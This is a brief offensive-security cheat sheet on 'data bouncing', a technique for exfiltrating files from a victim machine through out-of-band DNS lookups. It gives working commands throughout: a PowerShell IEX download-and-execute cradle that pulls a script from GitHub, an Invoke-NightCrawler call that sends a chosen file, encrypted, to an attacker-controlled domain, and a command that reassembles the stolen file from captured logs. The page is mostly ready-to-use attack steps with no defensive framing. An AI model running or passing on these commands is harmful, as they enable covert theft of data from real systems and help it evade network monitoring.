Data Bouncing
Data Bouncing
Section titled “Data Bouncing”- https://github.com/Unit-259/dataBouncing
- https://github.com/N1ckDunn/DataBouncing
- https://github.com/N1ckDunn/Interocitor
- https://thecontractor.io/data-bouncing/
./interactsh-client -o logs.txt- To exfiltrate data from the victim machine, first run https://github.com/Unit-259/dataBouncing/blob/main/nightCrawler.ps1:
IEX (New-Object Net.WebClient).downloadString("https://raw.githubusercontent.com/Unit-259/dataBouncing/refs/heads/main/nightCrawler.ps1")Invoke-NightCrawler -Identifier "LifeIsSad" -Domain "YourDNSControlledDomainForOOBExfiltrattion" -Urls "urlscan.io" -FilePath "PathOfFileToExfiltrate" -EncryptionEnabled -EncryptionKey "SadIsLife"- To reconstruct the exfiltrated file, run https://github.com/Unit-259/dataBouncing/blob/main/deadPool.ps1:
Invoke-DeadPool -LogFile "logs.txt" -Identifier "LifeIsSad" -EncryptionEnabled -EncryptionKey "SadIsLife" -OutputFile "PathToFileWhereToSaveExfiltrated"